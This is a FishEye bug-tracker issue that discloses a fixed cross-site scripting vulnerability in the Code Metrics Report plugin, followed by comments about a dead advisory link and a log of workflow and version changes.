Uploaded image for project: 'FishEye'
  1. FishEye
  2. FE-3129

XSS vulnerability in FishEye's Code Metrics Report plugin

XMLWordPrintable

    • Icon: Bug Bug
    • Resolution: Fixed
    • Icon: Highest Highest
    • 2.3.7, 2.4.0
    • 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.3.5, 2.3.6
    • None
    • None

      We have identified and fixed a cross-site scripting (XSS) vulnerability in FishEye's Code Metrics Report plugin. This affects FishEye 2.0.x to 2.3.6 inclusive.

      • An attacker might take advantage of an XSS vulnerability to steal the current session of a logged-in user.
      • XSS vulnerabilities potentially allow an attacker to embed their own JavaScript into a FishEye page. An attacker's text and script might be displayed to other people viewing the page.

      This issue is reported in our security advisory on this page:
      https://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-10-20

      You can read more about XSS attacks at cgisecurity, CERT and other places on the web:

            [FE-3129] XSS vulnerability in FishEye's Code Metrics Report plugin

            Owen made changes -
            Workflow Original: FE-CRUC Bug Workflow [ 2942384 ] New: JAC Bug Workflow v3 [ 2956770 ]
            Owen made changes -
            Workflow Original: FECRU Development Workflow - Triage - Restricted [ 1516003 ] New: FE-CRUC Bug Workflow [ 2942384 ]
            Owen made changes -
            Workflow Original: FECRU Development Workflow - Triage [ 944421 ] New: FECRU Development Workflow - Triage - Restricted [ 1516003 ]

            Brian Martin added a comment -

            Thanks for the quick reply and confirmation!

            Brian Martin added a comment - Thanks for the quick reply and confirmation!

            Andrew added a comment -

            brian1865464237 I've updated the link.

            Andrew added a comment - brian1865464237 I've updated the link.
            Andrew made changes -
            Description Original: We have identified and fixed a cross-site scripting (XSS) vulnerability in FishEye's Code Metrics Report plugin. This affects FishEye 2.0.x to 2.3.6 inclusive.

            * An attacker might take advantage of an XSS vulnerability to steal the current session of a logged-in user.
            * XSS vulnerabilities potentially allow an attacker to embed their own JavaScript into a FishEye page. An attacker's text and script might be displayed to other people viewing the page.

            This issue is reported in our security advisory on this page:
            http://confluence.atlassian.com/x/uwJrDQ

            You can read more about XSS attacks at cgisecurity, CERT and other places on the web:
            * http://www.cgisecurity.com/xss-faq.html
            * http://www.cert.org/advisories/CA-2000-02.html
            		New: We have identified and fixed a cross-site scripting (XSS) vulnerability in FishEye's Code Metrics Report plugin. This affects FishEye 2.0.x to 2.3.6 inclusive.

            * An attacker might take advantage of an XSS vulnerability to steal the current session of a logged-in user.
            * XSS vulnerabilities potentially allow an attacker to embed their own JavaScript into a FishEye page. An attacker's text and script might be displayed to other people viewing the page.

            This issue is reported in our security advisory on this page:
            https://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-10-20

            You can read more about XSS attacks at cgisecurity, CERT and other places on the web:
            * http://www.cgisecurity.com/xss-faq.html
            * http://www.cert.org/advisories/CA-2000-02.html

            Brian Martin added a comment -

            http://confluence.atlassian.com/x/uwJrDQ has been dead for some time. Is there an updated advisory link?

            Brian Martin added a comment - http://confluence.atlassian.com/x/uwJrDQ has been dead for some time. Is there an updated advisory link?
            Piotr Swiecicki made changes -
            Workflow Original: FECRU Development Workflow (Triage) [ 310441 ] New: FECRU Development Workflow - Triage [ 944421 ]
            Seb Ruiz (Inactive) made changes -
            Workflow Original: Simple review flow with triage [ 235555 ] New: FECRU Development Workflow (Triage) [ 310441 ]
            mwatson made changes -
            Component/s Original: FE [ 13190 ]
            Fix Version/s New: 2.3.7 [ 15544 ]
            Fix Version/s New: 2.4.0 [ 15350 ]
            Fix Version/s Original: 2.4.0 [ 15231 ]
            Fix Version/s Original: 2.3.7 [ 15500 ]
            Key Original: CRUC-4572 New: FE-3129
            Project Original: Crucible [ 11771 ] New: FishEye [ 11830 ]
            Affects Version/s New: 2.3.0 [ 15272 ]
            Affects Version/s New: 2.3.1 [ 15274 ]
            Affects Version/s New: 2.3.2 [ 15260 ]
            Affects Version/s New: 2.3.3 [ 15284 ]
            Affects Version/s New: 2.3.4 [ 15330 ]
            Affects Version/s New: 2.3.5 [ 15391 ]
            Affects Version/s New: 2.3.6 [ 15420 ]
            Affects Version/s Original: 2.3.0 [ 15232 ]
            Affects Version/s Original: 2.3.2 [ 15243 ]
            Affects Version/s Original: 2.3.1 [ 15273 ]
            Affects Version/s Original: 2.3.3 [ 15285 ]
            Affects Version/s Original: 2.3.4 [ 15331 ]
            Affects Version/s Original: 2.3.5 [ 15392 ]
            Affects Version/s Original: 2.3.6 [ 15421 ]
            Reporter Original: Andrew [ alui ]

              alui Andrew
              Anonymous Anonymous
              Affected customers:
              0 This affects my team
              Watchers:
              2 Start watching this issue

                Created:
                Updated:
                Resolved: